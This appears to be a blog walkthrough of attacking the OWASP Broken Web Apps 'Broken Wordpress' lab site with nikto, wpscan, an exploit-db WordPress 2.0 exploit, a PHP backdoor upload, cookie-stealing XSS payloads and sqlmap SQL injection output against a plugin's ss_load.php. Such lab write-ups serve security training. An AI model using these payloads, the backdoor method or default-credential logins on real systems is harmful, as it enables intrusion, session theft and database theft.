Tuesday, April 7, 2015

OWASP Broken Web Apps - Broken Wordpress Walkthrough

I thought I would work through a few of these web applications provided by OWASP on their broken web applications VM.

The first one I thought I would walkthrough is the "Broken Wordpress" site.  To begin the analysis I am trying to gather information about the site using nikto and wpscan.  The results with the commands executed I have placed below:

# nikto -h http://172.16.102.135/wordpress/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          172.16.102.135
+ Target Hostname:    172.16.102.135
+ Target Port:        80
+ Start Time:         
---------------------------------------------------------------------------
...snip...
+ Apache/2.2.14 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
...snip....
+ mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/3.0.17 mod_perl/2.0.4 Perl/v5.10.1 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
...snip...
+ Server leaks inodes via ETags, header found with file /wordpress/php.ini, inode: 278054, size: 386, mtime: Sun Mar 21 14:12:24 2010
...snip...
+ OSVDB-3092: /wordpress/xmlrpc.php: xmlrpc.php was found.
...snip...
+ /wordpress/readme.html: This WordPress file reveals the installed version.
...snip...
+ OSVDB-3092: /wordpress/license.txt: License file found may identify site software.
+ /wordpress/wp-login/: Admin login page/section found.
+ 6602 requests: 0 error(s) and 28 item(s) reported on remote host
+ End Time:            (62 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

CVE-2002-0082 - I tested this vulnerability not saying that it is not vulnerable.  I found the exploit 764.c that can utilize the buffer overflow in mod_ssl.  However this is applicable to the /usr/sbin/httpd binary not the /usr/sbin/apache2 binary.

Through the research to get this exploit to work on Kioptrix Level 1 I referenced the following pages:
http://poc-hack.blogspot.com/2012/08/kioptrix-hacking-challenge-level-1-part.html
http://paulsec.github.io/blog/2014/04/14/updating-openf***-exploit/

After fixing the code for the exploit based on the above sites and testing it on Kioptrix level 1 and it worked I attempted it on the broken web apps site.  Then I ran the objdump -R /usr/sbin/apache2 to identify a memory address of free.  I found one and added it to the code but this failed.  I gave up on this exploit for now not to say however there is not a vulnerability that could be exploited here.


The next item in the nikto log was the display of the contents of the file /wordpress/php.ini.  This file however does not display any additional information. Then I scanned down to see the following "+ /wordpress/readme.html: This WordPress file reveals the installed version." After viewing this file we find that it is version 2.0 of wordpress.

Doing a quick search of the exploit-db you find "http://www.exploit-db.com/exploits/6/".  This exploit only works if you have a username and password.  Luckily the admin password is admin.  The other item is the database password needs to be contained in a dictionary file.  The database password is simply "wordpress".  With this knowledge the exploit was easily exploited as shown below using the following command "php exploit.wordpress2 172.16.102.135 /wordpress/ admin admin ls -la -Ddic.txt":



You could say well what if you did not know the admin username and password.  You could register a user and be emailed a password.  Then you could utilize that, and then brute force the MySQL database.

Through an authenticated admin you can upload a backdoor.  I simply uploaded the simple-backdoor.php as a renamed file of sb.php.  This allowed access to the use of shell commands as the www-data user.

Posting of comments to a post and creating a new post with the following XSS items below will expose the cookies or include an iframe.

<p><script>alert(document.cookie);</script>
<iframe src="http://172.16.102.1/" /></p>

I also ran wpscan or Word Press Scan.  The results are below.  I briefly skimmed over these results:

_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                        Version v2.4.1
     Sponsored by the RandomStorm Open Source Initiative
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://172.16.102.135/wordpress/
[+] Started: Mon Apr  6 20:32:32 2015

[!] The WordPress 'http://172.16.102.135/wordpress/readme.html' file exists
[+] Interesting header: SERVER: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/3.0.17 mod_perl/2.0.4 Perl/v5.10.1
[+] Interesting header: STATUS: 200 OK
[+] Interesting header: X-POWERED-BY: PHP/5.3.2-1ubuntu4.5
[+] XML-RPC Interface available under: http://172.16.102.135/wordpress/xmlrpc.php

[+] WordPress version 2.0 identified from meta generator
[!] 9 vulnerabilities identified from the version number

[!] Title: Wordpress wp-register.php Multiple Parameter XSS
    Reference: http://osvdb.org/38577
[i] Fixed in: 2.0.2

[!] Title: WordPress 2.0 - 2.7.1 admin.php Module Configuration Security Bypass Vulnerability
    Reference: http://www.securityfocus.com/bid/35584/

[!] Title: XMLRPC Pingback API Internal/External Port Scanning
    Reference: https://github.com/FireFart/WordpressPingbackPortScanner

[!] Title: WordPress XMLRPC pingback additional issues
    Reference: http://lab.onsec.ru/2013/01/wordpress-xmlrpc-pingback-additional.html

[!] Title: wp-includes/comment.php bypass intended spam restrictions via a crafted URL
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-5293
[i] Fixed in: 3.0.2

[!] Title: Multiple cross-site scripting (XSS) in the request_filesystem_credentials function in wp-admin/includes/file.php
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-5294
[i] Fixed in: 3.0.2

[!] Title: Cross-site scripting (XSS) in wp-admin/plugins.php
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-5295
[i] Fixed in: 3.0.2

[!] Title: wp-includes/capabilities.php when a Multisite configuration is used, does not require the Super Admin role for the delete_users capability, which allows remote authenticated administrators to bypass intended access restrictions via a delete action.
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-5296
[i] Fixed in: 3.0.2

[!] Title: When a Multisite installation is used, permanently retains the "site administrators can add users" option once changed, which might allow remote authenticated administrators to bypass intended access restrictions in opportunistic circumstances via an add action after a temporary change.
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-5297
[i] Fixed in: 3.0

[+] WordPress theme in use: default - v1.5

[+] Name: default - v1.5
 |  Location: http://172.16.102.135/wordpress/wp-content/themes/default/
 |  Style URL: http://172.16.102.135/wordpress/wp-content/themes/default/style.css
 |  Theme Name: WordPress Default
 |  Theme URI: http://wordpress.org/
 |  Description: The default WordPress theme based on the famous <a href="http://binarybonsai.com/kubrick/">Kubric...
 |  Author: Michael Heilemann
 |  Author URI: http://binarybonsai.com/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Finished: Mon Apr  6 20:32:38 2015
[+] Memory used: 996 KB
[+] Elapsed time: 00:00:05


Well the above exploits require you to have authenticated to the site.  Let's look at a sql injection vulnerability that exists in a plugin on the site.

If you observe the 2 plugins being used the first is the "Wordpress Plugin Spreadsheet v0.6".  Doing a quick google search the following result came up.

By pulling up the exploit-db page for this exploit it leads us to the following location:
Then by browsing to the folder you can see that directory listing is not disabled.  You can actually see all the files in the directory used by the plugin.

The ss_load.php is the vulnerable file that allows for sql injection.  I followed the exploit and instead added a simple quote to see if it would cause a visual sql error message to appear on the screen.


Then you can exploit it by hand or by using sqlmap.  Below is the output from sqlmap that demonstrates that the variable ss_id is vulnerable to sql injection:

sqlmap -u "http://172.16.102.135/wordpress/wp-content/pns/wpSS/ss_load.php?ss_id=1"

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:23:25

[22:23:26] [INFO] testing connection to the target URL
[22:23:26] [INFO] testing if the target URL is stable. This can take a couple of seconds
[22:23:27] [INFO] target URL is stable
[22:23:27] [INFO] testing if GET parameter 'ss_id' is dynamic
[22:23:27] [INFO] confirming that GET parameter 'ss_id' is dynamic
[22:23:27] [INFO] GET parameter 'ss_id' is dynamic
[22:23:28] [INFO] heuristic (basic) test shows that GET parameter 'ss_id' might be injectable (possible DBMS: 'MySQL')
[22:23:28] [INFO] testing for SQL injection on GET parameter 'ss_id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y
[22:23:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:23:52] [WARNING] reflective value(s) found and filtering out
[22:23:52] [INFO] GET parameter 'ss_id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[22:23:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:23:53] [INFO] GET parameter 'ss_id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable 
[22:23:53] [INFO] testing 'MySQL inline queries'
[22:23:53] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:23:53] [WARNING] time-based comparison requires larger statistical model, please wait...................
[22:23:55] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[22:23:55] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[22:24:05] [INFO] GET parameter 'ss_id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable 
[22:24:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[22:24:05] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:24:06] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[22:24:06] [INFO] target URL appears to have 4 columns in query
[22:24:07] [INFO] GET parameter 'ss_id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'ss_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 43 HTTP(s) requests:
---
Place: GET
Parameter: ss_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ss_id=1 AND 1018=1018

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: ss_id=1 AND (SELECT 1220 FROM(SELECT COUNT(*),CONCAT(0x71616e6271,(SELECT (CASE WHEN (1220=1220) THEN 1 ELSE 0 END)),0x7171786c71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: ss_id=-3459 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71616e6271,0x4e4458524f6d69564d53,0x7171786c71)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: ss_id=1 AND SLEEP(5)
---
[22:24:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[22:24:16] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/172.16.102.135'

[*] shutting down at 22:24:16

Then to dump the contents of the wp_users table we used sqlmap again with different command line parameters.



No comments:

Post a Comment

Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...